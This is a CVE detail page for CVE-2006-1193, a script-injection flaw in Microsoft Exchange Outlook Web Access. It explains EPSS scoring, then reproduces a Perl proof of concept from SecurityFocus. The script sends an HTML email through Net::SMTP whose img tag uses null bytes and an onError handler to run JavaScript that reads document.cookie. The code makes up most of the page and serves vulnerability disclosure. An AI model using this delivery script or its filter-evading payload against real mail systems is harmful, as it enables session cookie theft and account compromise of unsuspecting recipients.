CVE-2006-1193 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/18381/info Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability. A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user. #!/usr/bin/perl use Net::SMTP; my $to = "recipient\@domain.tld"; my $sub = "Watch out - Cross Site Scripting Attack"; my $from = "originator\@domain2.tld"; my $smtp = "mail.example.tld"; my $cont = "<img alt='hugo\0abc' src='http://www.example.com/ imagethatdoesnotexist.gif' onError='javascript:alert(document.cookie)' alt='<s'\0"; $smtp = Net::SMTP->new($smtp); $smtp->mail("$from") || die("error 1"); $smtp->to("$to") || die("error 2"); $smtp->data() ; $smtp->datasend("To: $to\n") ; $smtp->datasend("From: $from\n") ; $smtp->datasend("Subject: $sub\n"); $smtp->datasend("Content-Type: text/html\n\n"); $smtp->datasend("$cont") ; $smtp->datasend("\n\n") ; $smtp->dataend() ; $smtp->quit() ; print "$cont\n\ndone\n";